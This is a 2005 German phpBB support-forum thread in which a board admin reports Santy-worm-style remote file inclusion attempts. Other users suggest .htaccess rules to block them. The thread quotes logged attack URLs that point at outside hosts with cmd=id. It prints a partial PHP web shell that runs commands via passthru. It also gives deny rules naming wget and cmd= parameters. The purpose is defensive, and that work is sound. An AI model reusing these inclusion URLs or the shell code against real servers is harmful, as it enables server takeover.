Seite 1 von 3
neue Wurmform?
Verfasst: 19.03.2005 12:33
von albe
Hallo,
ich glaube bei mir gabs einen neuartigen Wurmangriff. Bisherige Angriffe wurden mittels .htaccess und Mod rewrite und dem CBACK Mod ausgebremst.
Nun steht im Log:
Request URI:
/phpBB2/index.php?c=
http://lenoba.tripod.com.br/scmd.txt?&cmd=id
Kennt jemand von Euch diese Variante?
Verfasst: 19.03.2005 14:43
von larsneo
das sieht mir eher aus wie der versuch, schwachstellen automatisiert aufzuspüren. iirc ist das z.b. der payload bei einigen santy abkömmlingen...
Verfasst: 20.03.2005 08:11
von albe
Wie kann ich meine .htaccess anpassen um auch diese Anfragen zu unterbinden?
Verfasst: 20.03.2005 08:50
von larsneo
wie lautet denn der vollständige eintrag im log?
Verfasst: 20.03.2005 09:09
von albe
Das ist der komplette Eintrag:
18.03.2005, 12:15
200.165.125.85
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) /phpBB2/index.php?c=
http://lenoba.tripod.com.br/scmd.txt?&cmd=id
sieht so aus, als ob das jemand direkt auf der Website in seinen Browser eingegeben hat.
die hinterlegte Datei hat folgenden Inhalt:
&1");
else
@passthru("$cmd");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output))
echo str_replace(">", ">", str_replace("<", "<", $output));
}
else
echo "No command to execute.";
}
else {
echo "Due to SafeMode, it's unable to execute commands!\n";
echo "Machine informations:\n";
echo "PHP: ".phpversion()."\n";
echo "Server: $SERVER_SOFTWARE $SERVER_VERSION\n";
}
?>
Verfasst: 20.03.2005 12:35
von albe
Heute schon wieder eine neue Variante:
/phpBB2/lexique.php?lettre=
http://www.zenobio.net/lila.jpg?&cmd=id
http://www.zenobio.net/lila.jpg?&cmd=id
Seit Google die Beiträge aus meinem Board aufgenommen hat gibts mehrere Angriffe pro Minute
Verfasst: 20.03.2005 12:45
von larsneo
da mir keine aktive query mit cmd=[...] einfällt, sollte folgende .htaccess auch diese anfrage ins nirvana schicken:
Code: Alles auswählen
# prevent access from santy webworm a-e
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)cmd=
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
# prevent pre php 4.3.10 bug
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
Verfasst: 20.03.2005 14:45
von albe
Ich habe die Zeile
RewriteCond %{QUERY_STRING} ^(.*)cmd=
hinzugefügt. Damit dürften diese Abfragen nicht mehr erfolgen.
Verfasst: 04.07.2005 10:03
von Destruktor
Wenn ich die .htaccess angelege:
Code: Alles auswählen
# prevent access from santy webworm a-e
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)cmd=
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
# prevent pre php 4.3.10 bug
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
Ist die Seite nicht mehr erreichbar (403)
Verfasst: 04.07.2005 14:59
von TK
Dann ist mit höchster Wahrscheinlichkeit das PHP-Modul mod_rewrite bei dir entweder nicht eingeschaltet, oder gar nicht erst erlaubt bei deinem Anbieter... Frag deinen Host-Provider danach...
